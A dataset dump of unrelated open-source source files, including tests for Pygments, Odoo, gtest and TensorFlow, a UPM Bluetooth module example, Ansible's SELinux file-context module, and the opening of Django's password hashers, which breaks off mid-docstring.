repo_name
stringlengths
5
100
ref
stringlengths
12
67
path
stringlengths
4
244
copies
stringlengths
1
8
content
stringlengths
0
1.05M
markeldigital/design-system
refs/heads/master
vendor/ruby/2.0.0/gems/pygments.rb-0.6.3/vendor/pygments-main/tests/test_qbasiclexer.py
29
# -*- coding: utf-8 -*- """ Tests for QBasic ~~~~~~~~~~~~~~~~ :copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS. :license: BSD, see LICENSE for details. """ import glob import os import unittest from pygments.token import Token from pygments.lexers.qbasic import QBasicLexer class QBasicTest(unittest.TestCase): def setUp(self): self.lexer = QBasicLexer() self.maxDiff = None def testKeywordsWithDollar(self): fragment = u'DIM x\nx = RIGHT$("abc", 1)\n' expected = [ (Token.Keyword.Declaration, u'DIM'), (Token.Text.Whitespace, u' '), (Token.Name.Variable.Global, u'x'), (Token.Text, u'\n'), (Token.Name.Variable.Global, u'x'), (Token.Text.Whitespace, u' '), (Token.Operator, u'='), (Token.Text.Whitespace, u' '), (Token.Keyword.Reserved, u'RIGHT$'), (Token.Punctuation, u'('), (Token.Literal.String.Double, u'"abc"'), (Token.Punctuation, u','), (Token.Text.Whitespace, u' '), (Token.Literal.Number.Integer.Long, u'1'), (Token.Punctuation, u')'), (Token.Text, u'\n'), ] self.assertEqual(expected, list(self.lexer.get_tokens(fragment)))
skiselev/upm
refs/heads/master
examples/python/hm11.py
7
#!/usr/bin/python # Author: Zion Orent <zorent@ics.com> # Copyright (c) 2015 Intel Corporation. # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. from __future__ import print_function import time, sys, signal, atexit from upm import pyupm_hm11 as upmHm11 def main(): # Instantiate a HM11 BLE Module on UART 0 my_ble_obj = upmHm11.HM11(0) ## Exit handlers ## # This stops python from printing a stacktrace when you hit control-C def SIGINTHandler(signum, frame): raise SystemExit # This function lets you run code on exit, # including functions from my_ble_obj def exitHandler(): print("Exiting") sys.exit(0) # Register exit handlers atexit.register(exitHandler) signal.signal(signal.SIGINT, SIGINTHandler) bufferLength = 256 # make sure port is initialized properly. 9600 baud is the default. if (not my_ble_obj.setupTty(upmHm11.cvar.int_B9600)): print("Failed to setup tty port parameters") sys.exit(0) usageStr = ("Usage:\n" "Pass a commandline argument (any argument) to this program\n" "to query the radio configuration and output it. NOTE: the\n" "radio must be in CONFIG mode for this to work.\n\n" "Running this program without arguments will simply transmit\n" "'Hello World!' every second, and output any data received from\n" "another radio.\n\n") print(usageStr) # simple helper function to send a command and wait for a response def sendCommand(bleObj, cmd): bleBuffer = upmHm11.charArray(bufferLength) bleObj.writeData(cmd, len(cmd)) # wait up to 1 second if (bleObj.dataAvailable(1000)): bleObj.readData(bleBuffer, bufferLength) bleData = "" # read only the number of characters # specified by myGPSSensor.readData for x in range(0, bufferLength): if (bleBuffer.__getitem__(x) == '\0'): break else: bleData += bleBuffer.__getitem__(x) print(bleData) else: print("Timed out waiting for response") if (len(sys.argv) > 1): print("Sending command line argument (" + sys.argv[1] + ")...") sendCommand(my_ble_obj, sys.argv[1]) else: # query the module address addr = "AT+ADDR?"; print("Querying module address (" + addr + ")...") sendCommand(my_ble_obj, addr) time.sleep(1) # query the module address pin = "AT+PASS?"; print("Querying module PIN (" + pin + ")...") sendCommand(my_ble_obj, pin) # Other potentially useful commands are: # # AT+VERS? - query module version # AT+ROLE0 - set as slave # AT+ROLE1 - set as master # AT+CLEAR - clear all previous settings # AT+RESET - restart the device # # A comprehensive list is available from the datasheet at: # http://www.seeedstudio.com/wiki/images/c/cd/Bluetooth4_en.pdf if __name__ == '__main__': main()
gvb/odoo
refs/heads/8.0
openerp/addons/test_new_api/tests/test_related.py
247
# # test cases for related fields, etc. # import unittest from openerp.osv import fields from openerp.tests import common class TestRelatedField(common.TransactionCase): def setUp(self): super(TestRelatedField, self).setUp() self.partner = self.registry('res.partner') self.company = self.registry('res.company') def test_0_related(self): """ test an usual related field """ # find a company with a non-null partner_id ids = self.company.search(self.cr, self.uid, [('partner_id', '!=', False)], limit=1) id = ids[0] # find partners that satisfy [('partner_id.company_id', '=', id)] company_ids = self.company.search(self.cr, self.uid, [('partner_id', '=', id)]) partner_ids1 = self.partner.search(self.cr, self.uid, [('company_id', 'in', company_ids)]) partner_ids2 = self.partner.search(self.cr, self.uid, [('related_company_partner_id', '=', id)]) self.assertEqual(partner_ids1, partner_ids2) def do_test_company_field(self, field): # get a partner with a non-null company_id ids = self.partner.search(self.cr, self.uid, [('company_id', '!=', False)], limit=1) partner = self.partner.browse(self.cr, self.uid, ids[0]) # check reading related field self.assertEqual(partner[field], partner.company_id) # check that search on related field is equivalent to original field ids1 = self.partner.search(self.cr, self.uid, [('company_id', '=', partner.company_id.id)]) ids2 = self.partner.search(self.cr, self.uid, [(field, '=', partner.company_id.id)]) self.assertEqual(ids1, ids2) def test_1_single_related(self): """ test a related field with a single indirection like fields.related('foo') """ self.do_test_company_field('single_related_company_id') def test_2_related_related(self): """ test a related field referring to a related field """ self.do_test_company_field('related_related_company_id') def test_3_read_write(self): """ write on a related field """ # find a company with a non-null partner_id company_ids = self.company.search(self.cr, self.uid, [('partner_id', '!=', False)], limit=1) company = self.company.browse(self.cr, self.uid, company_ids[0]) # find partners that satisfy [('company_id.partner_id', '=', company.partner_id.id)] partner_ids = self.partner.search(self.cr, self.uid, [('related_company_partner_id', '=', company.partner_id.id)]) self.assertGreater(len(partner_ids), 0) partner = self.partner.browse(self.cr, self.uid, partner_ids[0]) # create a new partner, and assign it to company new_partner_id = self.partner.create(self.cr, self.uid, {'name': 'Foo'}) partner.write({'related_company_partner_id': new_partner_id}) company = self.company.browse(self.cr, self.uid, company_ids[0]) self.assertEqual(company.partner_id.id, new_partner_id) partner = self.partner.browse(self.cr, self.uid, partner_ids[0]) self.assertEqual(partner.related_company_partner_id.id, new_partner_id) class TestPropertyField(common.TransactionCase): def setUp(self): super(TestPropertyField, self).setUp() self.user = self.registry('res.users') self.partner = self.registry('res.partner') self.company = self.registry('res.company') self.country = self.registry('res.country') self.property = self.registry('ir.property') self.imd = self.registry('ir.model.data') @unittest.skip("invalid monkey-patching") def test_1_property_multicompany(self): cr, uid = self.cr, self.uid parent_company_id = self.imd.get_object_reference(cr, uid, 'base', 'main_company')[1] country_be = self.imd.get_object_reference(cr, uid, 'base', 'be')[1] country_fr = self.imd.get_object_reference(cr, uid, 'base', 'fr')[1] group_partner_manager = self.imd.get_object_reference(cr, uid, 'base', 'group_partner_manager')[1] group_multi_company = self.imd.get_object_reference(cr, uid, 'base', 'group_multi_company')[1] sub_company = self.company.create(cr, uid, {'name': 'MegaCorp', 'parent_id': parent_company_id}) alice = self.user.create(cr, uid, {'name': 'Alice', 'login':'alice', 'email':'alice@youcompany.com', 'company_id':parent_company_id, 'company_ids':[(6, 0, [parent_company_id, sub_company])], 'country_id':country_be, 'groups_id': [(6, 0, [group_partner_manager, group_multi_company])] }) bob = self.user.create(cr, uid, {'name': 'Bob', 'login':'bob', 'email':'bob@megacorp.com', 'company_id':sub_company, 'company_ids':[(6, 0, [parent_company_id, sub_company])], 'country_id':country_fr, 'groups_id': [(6, 0, [group_partner_manager, group_multi_company])] }) self.partner._columns = dict(self.partner._columns) self.partner._columns.update({ 'property_country': fields.property(type='many2one', relation="res.country", string="Country by company"), }) self.partner._field_create(cr) partner_id = self.partner.create(cr, alice, { 'name': 'An International Partner', 'email': 'partner@example.com', 'company_id': parent_company_id, }) self.partner.write(cr, bob, [partner_id], {'property_country': country_fr}) self.assertEqual(self.partner.browse(cr, bob, partner_id).property_country.id, country_fr, "Bob does not see the value he has set on the property field") self.partner.write(cr, alice, [partner_id], {'property_country': country_be}) self.assertEqual(self.partner.browse(cr, alice, partner_id).property_country.id, country_be, "Alice does not see the value he has set on the property field") self.assertEqual(self.partner.browse(cr, bob, partner_id).property_country.id, country_fr, "Changes made by Alice have overwritten Bob's value") class TestHtmlField(common.TransactionCase): def setUp(self): super(TestHtmlField, self).setUp() self.partner = self.registry('res.partner') def test_00_sanitize(self): cr, uid, context = self.cr, self.uid, {} old_columns = self.partner._columns self.partner._columns = dict(old_columns) self.partner._columns.update({ 'comment': fields.html('Secure Html', sanitize=False), }) some_ugly_html = """<p>Oops this should maybe be sanitized % if object.some_field and not object.oriented: <table> % if object.other_field: <tr style="border: 10px solid black;"> ${object.mako_thing} <td> </tr> % endif <tr> %if object.dummy_field: <p>Youpie</p> %endif""" pid = self.partner.create(cr, uid, { 'name': 'Raoul Poilvache', 'comment': some_ugly_html, }, context=context) partner = self.partner.browse(cr, uid, pid, context=context) self.assertEqual(partner.comment, some_ugly_html, 'Error in HTML field: content was sanitized but field has sanitize=False') self.partner._columns.update({ 'comment': fields.html('Unsecure Html', sanitize=True), }) self.partner.write(cr, uid, [pid], { 'comment': some_ugly_html, }, context=context) partner = self.partner.browse(cr, uid, pid, context=context) # sanitize should have closed tags left open in the original html self.assertIn('</table>', partner.comment, 'Error in HTML field: content does not seem to have been sanitized despise sanitize=True') self.assertIn('</td>', partner.comment, 'Error in HTML field: content does not seem to have been sanitized despise sanitize=True') self.assertIn('<tr style="', partner.comment, 'Style attr should not have been stripped') self.partner._columns['comment'] = fields.html('Stripped Html', sanitize=True, strip_style=True) self.partner.write(cr, uid, [pid], {'comment': some_ugly_html}, context=context) partner = self.partner.browse(cr, uid, pid, context=context) self.assertNotIn('<tr style="', partner.comment, 'Style attr should have been stripped') self.partner._columns = old_columns
mahak/ansible
refs/heads/devel
test/support/integration/plugins/modules/sefcontext.py
18
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright: (c) 2016, Dag Wieers (@dagwieers) <dag@wieers.com> # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = r''' --- module: sefcontext short_description: Manages SELinux file context mapping definitions description: - Manages SELinux file context mapping definitions. - Similar to the C(semanage fcontext) command. version_added: '2.2' options: target: description: - Target path (expression). type: str required: yes aliases: [ path ] ftype: description: - The file type that should have SELinux contexts applied. - "The following file type options are available:" - C(a) for all files, - C(b) for block devices, - C(c) for character devices, - C(d) for directories, - C(f) for regular files, - C(l) for symbolic links, - C(p) for named pipes, - C(s) for socket files. type: str choices: [ a, b, c, d, f, l, p, s ] default: a setype: description: - SELinux type for the specified target. type: str required: yes seuser: description: - SELinux user for the specified target. type: str selevel: description: - SELinux range for the specified target. type: str aliases: [ serange ] state: description: - Whether the SELinux file context must be C(absent) or C(present). type: str choices: [ absent, present ] default: present reload: description: - Reload SELinux policy after commit. - Note that this does not apply SELinux file contexts to existing files. type: bool default: yes ignore_selinux_state: description: - Useful for scenarios (chrooted environment) that you can't get the real SELinux state. type: bool default: no version_added: '2.8' notes: - The changes are persistent across reboots. - The M(sefcontext) module does not modify existing files to the new SELinux context(s), so it is advisable to first create the SELinux file contexts before creating files, or run C(restorecon) manually for the existing files that require the new SELinux file contexts. - Not applying SELinux fcontexts to existing files is a deliberate decision as it would be unclear what reported changes would entail to, and there's no guarantee that applying SELinux fcontext does not pick up other unrelated prior changes. requirements: - libselinux-python - policycoreutils-python author: - Dag Wieers (@dagwieers) ''' EXAMPLES = r''' - name: Allow apache to modify files in /srv/git_repos sefcontext: target: '/srv/git_repos(/.*)?' setype: httpd_git_rw_content_t state: present - name: Apply new SELinux file context to filesystem command: restorecon -irv /srv/git_repos ''' RETURN = r''' # Default return values ''' import os import subprocess import traceback from ansible.module_utils.basic import AnsibleModule, missing_required_lib from ansible.module_utils.common.respawn import has_respawned, probe_interpreters_for_module, respawn_module from ansible.module_utils._text import to_native SELINUX_IMP_ERR = None try: import selinux HAVE_SELINUX = True except ImportError: SELINUX_IMP_ERR = traceback.format_exc() HAVE_SELINUX = False SEOBJECT_IMP_ERR = None try: import seobject HAVE_SEOBJECT = True except ImportError: SEOBJECT_IMP_ERR = traceback.format_exc() HAVE_SEOBJECT = False # Add missing entries (backward compatible) if HAVE_SEOBJECT: seobject.file_types.update( a=seobject.SEMANAGE_FCONTEXT_ALL, b=seobject.SEMANAGE_FCONTEXT_BLOCK, c=seobject.SEMANAGE_FCONTEXT_CHAR, d=seobject.SEMANAGE_FCONTEXT_DIR, f=seobject.SEMANAGE_FCONTEXT_REG, l=seobject.SEMANAGE_FCONTEXT_LINK, p=seobject.SEMANAGE_FCONTEXT_PIPE, s=seobject.SEMANAGE_FCONTEXT_SOCK, ) # Make backward compatible option_to_file_type_str = dict( a='all files', b='block device', c='character device', d='directory', f='regular file', l='symbolic link', p='named pipe', s='socket', ) def get_runtime_status(ignore_selinux_state=False): return True if ignore_selinux_state is True else selinux.is_selinux_enabled() def semanage_fcontext_exists(sefcontext, target, ftype): ''' Get the SELinux file context mapping definition from policy. Return None if it does not exist. ''' # Beware that records comprise of a string representation of the file_type record = (target, option_to_file_type_str[ftype]) records = sefcontext.get_all() try: return records[record] except KeyError: return None def semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser, sestore=''): ''' Add or modify SELinux file context mapping definition to the policy. ''' changed = False prepared_diff = '' try: sefcontext = seobject.fcontextRecords(sestore) sefcontext.set_reload(do_reload) exists = semanage_fcontext_exists(sefcontext, target, ftype) if exists: # Modify existing entry orig_seuser, orig_serole, orig_setype, orig_serange = exists if seuser is None: seuser = orig_seuser if serange is None: serange = orig_serange if setype != orig_setype or seuser != orig_seuser or serange != orig_serange: if not module.check_mode: sefcontext.modify(target, setype, ftype, serange, seuser) changed = True if module._diff: prepared_diff += '# Change to semanage file context mappings\n' prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, orig_seuser, orig_serole, orig_setype, orig_serange) prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, orig_serole, setype, serange) else: # Add missing entry if seuser is None: seuser = 'system_u' if serange is None: serange = 's0' if not module.check_mode: sefcontext.add(target, setype, ftype, serange, seuser) changed = True if module._diff: prepared_diff += '# Addition to semanage file context mappings\n' prepared_diff += '+%s %s %s:%s:%s:%s\n' % (target, ftype, seuser, 'object_r', setype, serange) except Exception as e: module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e))) if module._diff and prepared_diff: result['diff'] = dict(prepared=prepared_diff) module.exit_json(changed=changed, seuser=seuser, serange=serange, **result) def semanage_fcontext_delete(module, result, target, ftype, do_reload, sestore=''): ''' Delete SELinux file context mapping definition from the policy. ''' changed = False prepared_diff = '' try: sefcontext = seobject.fcontextRecords(sestore) sefcontext.set_reload(do_reload) exists = semanage_fcontext_exists(sefcontext, target, ftype) if exists: # Remove existing entry orig_seuser, orig_serole, orig_setype, orig_serange = exists if not module.check_mode: sefcontext.delete(target, ftype) changed = True if module._diff: prepared_diff += '# Deletion to semanage file context mappings\n' prepared_diff += '-%s %s %s:%s:%s:%s\n' % (target, ftype, exists[0], exists[1], exists[2], exists[3]) except Exception as e: module.fail_json(msg="%s: %s\n" % (e.__class__.__name__, to_native(e))) if module._diff and prepared_diff: result['diff'] = dict(prepared=prepared_diff) module.exit_json(changed=changed, **result) def main(): module = AnsibleModule( argument_spec=dict( ignore_selinux_state=dict(type='bool', default=False), target=dict(type='str', required=True, aliases=['path']), ftype=dict(type='str', default='a', choices=option_to_file_type_str.keys()), setype=dict(type='str', required=True), seuser=dict(type='str'), selevel=dict(type='str', aliases=['serange']), state=dict(type='str', default='present', choices=['absent', 'present']), reload=dict(type='bool', default=True), ), supports_check_mode=True, ) if not HAVE_SELINUX or not HAVE_SEOBJECT and not has_respawned(): system_interpreters = [ '/usr/libexec/platform-python', '/usr/bin/python3', '/usr/bin/python2', ] # policycoreutils-python depends on libselinux-python interpreter = probe_interpreters_for_module(system_interpreters, 'seobject') if interpreter: respawn_module(interpreter) if not HAVE_SELINUX or not HAVE_SEOBJECT: module.fail_json(msg=missing_required_lib("policycoreutils-python(3)"), exception=SELINUX_IMP_ERR) ignore_selinux_state = module.params['ignore_selinux_state'] if not get_runtime_status(ignore_selinux_state): module.fail_json(msg="SELinux is disabled on this host.") target = module.params['target'] ftype = module.params['ftype'] setype = module.params['setype'] seuser = module.params['seuser'] serange = module.params['selevel'] state = module.params['state'] do_reload = module.params['reload'] result = dict(target=target, ftype=ftype, setype=setype, state=state) if state == 'present': semanage_fcontext_modify(module, result, target, ftype, setype, do_reload, serange, seuser) elif state == 'absent': semanage_fcontext_delete(module, result, target, ftype, do_reload) else: module.fail_json(msg='Invalid value of argument "state": {0}'.format(state)) if __name__ == '__main__': main()
tempbottle/rethinkdb
refs/heads/next
external/v8_3.30.33.16/testing/gtest/test/gtest_list_tests_unittest.py
1898
#!/usr/bin/env python # # Copyright 2006, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. """Unit test for Google Test's --gtest_list_tests flag. A user can ask Google Test to list all tests by specifying the --gtest_list_tests flag. This script tests such functionality by invoking gtest_list_tests_unittest_ (a program written with Google Test) the command line flags. """ __author__ = 'phanna@google.com (Patrick Hanna)' import gtest_test_utils import re # Constants. # The command line flag for enabling/disabling listing all tests. LIST_TESTS_FLAG = 'gtest_list_tests' # Path to the gtest_list_tests_unittest_ program. EXE_PATH = gtest_test_utils.GetTestExecutablePath('gtest_list_tests_unittest_') # The expected output when running gtest_list_tests_unittest_ with # --gtest_list_tests EXPECTED_OUTPUT_NO_FILTER_RE = re.compile(r"""FooDeathTest\. Test1 Foo\. Bar1 Bar2 DISABLED_Bar3 Abc\. Xyz Def FooBar\. Baz FooTest\. Test1 DISABLED_Test2 Test3 TypedTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\. TestA TestB TypedTest/1\. # TypeParam = int\s*\* TestA TestB TypedTest/2\. # TypeParam = .*MyArray<bool,\s*42> TestA TestB My/TypeParamTest/0\. # TypeParam = (VeryLo{245}|class VeryLo{239})\.\.\. TestA TestB My/TypeParamTest/1\. # TypeParam = int\s*\* TestA TestB My/TypeParamTest/2\. # TypeParam = .*MyArray<bool,\s*42> TestA TestB MyInstantiation/ValueParamTest\. TestA/0 # GetParam\(\) = one line TestA/1 # GetParam\(\) = two\\nlines TestA/2 # GetParam\(\) = a very\\nlo{241}\.\.\. TestB/0 # GetParam\(\) = one line TestB/1 # GetParam\(\) = two\\nlines TestB/2 # GetParam\(\) = a very\\nlo{241}\.\.\. """) # The expected output when running gtest_list_tests_unittest_ with # --gtest_list_tests and --gtest_filter=Foo*. EXPECTED_OUTPUT_FILTER_FOO_RE = re.compile(r"""FooDeathTest\. Test1 Foo\. Bar1 Bar2 DISABLED_Bar3 FooBar\. Baz FooTest\. Test1 DISABLED_Test2 Test3 """) # Utilities. def Run(args): """Runs gtest_list_tests_unittest_ and returns the list of tests printed.""" return gtest_test_utils.Subprocess([EXE_PATH] + args, capture_stderr=False).output # The unit test. class GTestListTestsUnitTest(gtest_test_utils.TestCase): """Tests using the --gtest_list_tests flag to list all tests.""" def RunAndVerify(self, flag_value, expected_output_re, other_flag): """Runs gtest_list_tests_unittest_ and verifies that it prints the correct tests. Args: flag_value: value of the --gtest_list_tests flag; None if the flag should not be present. expected_output_re: regular expression that matches the expected output after running command; other_flag: a different flag to be passed to command along with gtest_list_tests; None if the flag should not be present. """ if flag_value is None: flag = '' flag_expression = 'not set' elif flag_value == '0': flag = '--%s=0' % LIST_TESTS_FLAG flag_expression = '0' else: flag = '--%s' % LIST_TESTS_FLAG flag_expression = '1' args = [flag] if other_flag is not None: args += [other_flag] output = Run(args) if expected_output_re: self.assert_( expected_output_re.match(output), ('when %s is %s, the output of "%s" is "%s",\n' 'which does not match regex "%s"' % (LIST_TESTS_FLAG, flag_expression, ' '.join(args), output, expected_output_re.pattern))) else: self.assert_( not EXPECTED_OUTPUT_NO_FILTER_RE.match(output), ('when %s is %s, the output of "%s" is "%s"'% (LIST_TESTS_FLAG, flag_expression, ' '.join(args), output))) def testDefaultBehavior(self): """Tests the behavior of the default mode.""" self.RunAndVerify(flag_value=None, expected_output_re=None, other_flag=None) def testFlag(self): """Tests using the --gtest_list_tests flag.""" self.RunAndVerify(flag_value='0', expected_output_re=None, other_flag=None) self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE, other_flag=None) def testOverrideNonFilterFlags(self): """Tests that --gtest_list_tests overrides the non-filter flags.""" self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_NO_FILTER_RE, other_flag='--gtest_break_on_failure') def testWithFilterFlags(self): """Tests that --gtest_list_tests takes into account the --gtest_filter flag.""" self.RunAndVerify(flag_value='1', expected_output_re=EXPECTED_OUTPUT_FILTER_FOO_RE, other_flag='--gtest_filter=Foo*') if __name__ == '__main__': gtest_test_utils.Main()
dancingdan/tensorflow
refs/heads/master
tensorflow/contrib/nearest_neighbor/python/kernel_tests/hyperplane_lsh_probes_test.py
25
# Copyright 2017 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Tests for hyperplane_lsh_probes.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.contrib.nearest_neighbor.python.ops.nearest_neighbor_ops import hyperplane_lsh_probes from tensorflow.python.platform import test class HyperplaneLshProbesTest(test.TestCase): # We only test the batch functionality of the op here because the multiprobe # tests in hyperplane_lsh_probes_test.cc already cover most of the LSH # functionality. def simple_batch_test(self): with self.cached_session(): hyperplanes = np.eye(4) points = np.array([[1.2, 0.5, -0.9, -1.0], [2.0, -3.0, 1.0, -1.5]]) product = np.dot(points, hyperplanes) num_tables = 2 num_hyperplanes_per_table = 2 num_probes = 4 hashes, tables = hyperplane_lsh_probes(product, num_tables, num_hyperplanes_per_table, num_probes) self.assertAllEqual(hashes.eval(), [[3, 0, 2, 2], [2, 2, 0, 3]]) self.assertAllEqual(tables.eval(), [[0, 1, 0, 1], [0, 1, 1, 1]]) if __name__ == '__main__': test.main()
intgr/django
refs/heads/master
django/contrib/auth/hashers.py
45
import base64 import binascii import functools import hashlib import importlib import warnings from collections import OrderedDict from django.conf import settings from django.core.exceptions import ImproperlyConfigured from django.core.signals import setting_changed from django.dispatch import receiver from django.utils.crypto import ( constant_time_compare, get_random_string, pbkdf2, ) from django.utils.encoding import force_bytes, force_text from django.utils.module_loading import import_string from django.utils.translation import gettext_noop as _ UNUSABLE_PASSWORD_PREFIX = '!' # This will never be a valid encoded hash UNUSABLE_PASSWORD_SUFFIX_LENGTH = 40 # number of random chars to add after UNUSABLE_PASSWORD_PREFIX def is_password_usable(encoded): if encoded is None or encoded.startswith(UNUSABLE_PASSWORD_PREFIX): return False try: identify_hasher(encoded) except ValueError: return False return True def check_password(password, encoded, setter=None, preferred='default'): """ Return a boolean of whether the raw password matches the three part encoded digest. If setter is specified, it'll be called when you need to regenerate the password. """ if password is None or not is_password_usable(encoded): return False preferred = get_hasher(preferred) hasher = identify_hasher(encoded) hasher_changed = hasher.algorithm != preferred.algorithm must_update = hasher_changed or preferred.must_update(encoded) is_correct = hasher.verify(password, encoded) # If the hasher didn't change (we don't protect against enumeration if it # does) and the password should get updated, try to close the timing gap # between the work factor of the current encoded password and the default # work factor. if not is_correct and not hasher_changed and must_update: hasher.harden_runtime(password, encoded) if setter and is_correct and must_update: setter(password) return is_correct def make_password(password, salt=None, hasher='default'): """ Turn a plain-text password into a hash for database storage Same as encode() but generate a new random salt. If password is None then return a concatenation of UNUSABLE_PASSWORD_PREFIX and a random string, which disallows logins. Additional random string reduces chances of gaining access to staff or superuser accounts. See ticket #20079 for more info. """ if password is None: return UNUSABLE_PASSWORD_PREFIX + get_random_string(UNUSABLE_PASSWORD_SUFFIX_LENGTH) hasher = get_hasher(hasher) if not salt: salt = hasher.salt() return hasher.encode(password, salt) @functools.lru_cache() def get_hashers(): hashers = [] for hasher_path in settings.PASSWORD_HASHERS: hasher_cls = import_string(hasher_path) hasher = hasher_cls() if not getattr(hasher, 'algorithm'): raise ImproperlyConfigured("hasher doesn't specify an " "algorithm name: %s" % hasher_path) hashers.append(hasher) return hashers @functools.lru_cache() def get_hashers_by_algorithm(): return {hasher.algorithm: hasher for hasher in get_hashers()} @receiver(setting_changed) def reset_hashers(**kwargs): if kwargs['setting'] == 'PASSWORD_HASHERS': get_hashers.cache_clear() get_hashers_by_algorithm.cache_clear() def get_hasher(algorithm='default'): """ Return an instance of a loaded password hasher. If algorithm is 'default', return the default hasher. Lazily import hashers specified in the project's settings file if needed. """ if hasattr(algorithm, 'algorithm'): return algorithm elif algorithm == 'default': return get_hashers()[0] else: hashers = get_hashers_by_algorithm() try: return hashers[algorithm] except KeyError: raise ValueError("Unknown password hashing algorithm '%s'. " "Did you specify it in the PASSWORD_HASHERS " "setting?" % algorithm) def identify_hasher(encoded): """ Return an instance of a loaded password hasher. Identify hasher algorithm by examining encoded hash, and call get_hasher() to return hasher. Raise ValueError if algorithm cannot be identified, or if hasher is not loaded. """ # Ancient versions of Django created plain MD5 passwords and accepted # MD5 passwords with an empty salt. if ((len(encoded) == 32 and '$' not in encoded) or (len(encoded) == 37 and encoded.startswith('md5$$'))): algorithm = 'unsalted_md5' # Ancient versions of Django accepted SHA1 passwords with an empty salt. elif len(encoded) == 46 and encoded.startswith('sha1$$'): algorithm = 'unsalted_sha1' else: algorithm = encoded.split('$', 1)[0] return get_hasher(algorithm) def mask_hash(hash, show=6, char="*"): """ Return the given hash, with only the first ``show`` number shown. The rest are masked with ``char`` for security reasons. """ masked = hash[:show] masked += char * len(hash[show:]) return masked class BasePasswordHasher: """ Abstract base class for password hashers When creating your own hasher, you need to override algorithm, verify(), encode() and safe_summary(). PasswordHasher objects are immutable. """ algorithm = None library = None def _load_library(self): if self.library is not None: if isinstance(self.library, (tuple, list)): name, mod_path = self.library else: mod_path = self.library try: module = importlib.import_module(mod_path) except ImportError as e: raise ValueError("Couldn't load %r algorithm library: %s" % (self.__class__.__name__, e)) return module raise ValueError("Hasher %r doesn't specify a library attribute" % self.__class__.__name__) def salt(self): """Generate a cryptographically secure nonce salt in ASCII.""" return get_random_string() def verify(self, password, encoded): """Check if the given password is correct.""" raise NotImplementedError('subclasses of BasePasswordHasher must provide a verify() method') def encode(self, password, salt): """ Create an encoded database value. The result is normally formatted as "algorithm$salt$hash" and must be fewer than 128 characters. """ raise NotImplementedError('subclasses of BasePasswordHasher must provide an encode() method') def safe_summary(self, encoded): """ Return a summary of safe values. The result is a dictionary and will be used where the password field must be displayed to construct a safe representation of the password. """ raise NotImplementedError('subclasses of BasePasswordHasher must provide a safe_summary() method') def must_update(self, encoded): return False def harden_runtime(self, password, encoded): """ Bridge the runtime gap between the work factor supplied in `encoded` and the work factor suggested by this hasher. Taking PBKDF2 as an example, if `encoded` contains 20000 iterations and `self.iterations` is 30000, this method should run password through another 10000 iterations of PBKDF2. Similar approaches should exist for any hasher that has a work factor. If not, this method should be defined as a no-op to silence the warning. """ warnings.warn('subclasses of BasePasswordHasher should provide a harden_runtime() method') class PBKDF2PasswordHasher(BasePasswordHasher): """ Secure password hashing using the PBKDF2 algorithm (recommended) Configured to use PBKDF2 + HMAC + SHA256. The 